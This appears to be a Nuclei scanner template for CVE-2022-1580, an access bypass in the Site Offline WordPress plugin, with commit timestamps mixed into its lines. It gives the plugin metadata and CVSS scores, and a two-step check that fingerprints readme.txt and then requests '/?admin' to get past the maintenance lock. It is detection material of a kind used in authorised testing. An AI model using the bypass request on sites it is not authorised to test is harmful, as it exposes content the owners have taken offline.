2024-05-08 11:45:01 +00:00
id : CVE-2022-1580
info :
name : Site Offline WP Plugin < 1.5.3 - Access Bypass
author : Kazgangap
severity : medium
description : |
The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.
2024-05-24 05:26:32 +00:00
remediation : Fixed in 1.5.3
2024-05-08 11:45:01 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2022-1580
- https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score : 4.3
cve-id : CVE-2022-1580
cwe-id : CWE-639
epss-score : 0.00058
2024-05-24 05:26:32 +00:00
epss-percentile : 0.24444
2024-05-08 11:45:01 +00:00
cpe : cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:*
metadata :
2024-05-24 05:26:32 +00:00
verified : true
max-request : 1
2024-05-08 11:45:01 +00:00
vendor : freehtmldesigns
product : site_offline
framework : wordpress
2024-05-24 05:26:32 +00:00
publicwww-query : "/wp-content/plugins/site-offline/"
tags : cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp
2024-05-08 11:45:01 +00:00
flow : http(1) && http(2)
http :
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"
matchers :
- type : word
internal : true
words :
2024-05-23 05:10:40 +00:00
- 'Site Offline Or Coming Soon Or Maintenance Mode'
2024-05-08 11:45:01 +00:00
- method : GET
path :
- "{{BaseURL}}/?admin"
matchers-condition : and
matchers :
- type : word
words :
- "wp-block"
- "author"
2024-05-24 05:26:32 +00:00
condition : and
2024-05-08 11:45:01 +00:00
- type : status
status :
2024-05-23 05:10:40 +00:00
- 200
